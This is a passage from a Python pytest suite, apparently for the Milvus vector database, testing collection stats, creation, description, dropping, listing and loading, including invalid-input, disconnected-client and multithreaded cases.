@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
        target: test collection rows_count is correct or not with multiple collections of L2 and JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
        expected: row count is 0
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
        target: test get_collection_stats without connection
        method: call get_collection_stats with correct params on a disconnected instance
        expected: get_collection_stats raises exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
        method: create collection, create partitions, add entities to the collection and to one created partition,
                assert the value returned by count_entities method
        expected: the count is equal to twice the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
        method: create collection, create partitions and add entities to both created partitions,
                assert the value returned by count_entities method
        expected: the collection count is equal to twice the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
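# --- Illustrative sketch (not part of the original suite) ---
# The insert -> flush -> row-count pattern that the stats tests above verify,
# expressed with the ORM's num_entities property. Assumes a reachable Milvus
# server and an existing collection named "stats_demo" with an int64 primary
# key and an 8-dim float vector; Collection.flush() is used here, while the
# tests above flush through the connection object instead.
def _sketch_row_count_after_flush(nb=100):
    import numpy as np
    from pymilvus import connections, Collection

    connections.connect(host="127.0.0.1", port="19530")
    coll = Collection("stats_demo")
    coll.insert([list(range(nb)), [np.random.random(8).tolist() for _ in range(nb)]])
    coll.flush()
    assert coll.num_entities == nb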
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
        target: test create collection with different segment_row_limit values
        method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
        target: test create collection with more than the maximum number of fields
        method: add fields beyond the 64-field limit
        expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_not_existed(self, connect):
"""
        target: test describe collection after it has been dropped
        method: generate a random collection name, create the collection, drop it,
                then call describe_collection again
        expected: raise exception (collection not found)
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_multithread(self, connect):
"""
target: test describe collection with multithread
method: call describe_collection from multiple threads,
expected: collection info is returned in every thread
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test drop collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_not_existed(self, connect):
"""
target: test dropping a collection that was never created
method: generate a random collection name that does not exist in the db,
assert the exception raised by the drop_collection method
expected: exception raised
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multithread
method: create and drop collection using multithread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test drop collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.drop_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_has_collection_not_existed(self, connect):
"""
target: test if collection not created
method: generate a random collection name, create the collection then drop it,
assert the value returned by the has_collection method
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test has collection with multithread
method: call has_collection from multiple threads,
expected: has_collection returns True in every thread
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test has collection with invalid scenario
method: call has_collection with an invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
"""
target: test has collection with invalid scenario
method: call has_collection with an empty collection name
expected: raise exception
"""
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
"""
target: test has collection with invalid scenario
method: call has_collection with None as the collection name
expected: raise exception
"""
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test list_collections returns correct results when no collection exists in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multithread
method: list collection using multithread,
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_empty_collection(self, connect, collection):
"""
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load a collection that does not exist
method: load a non-existent collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
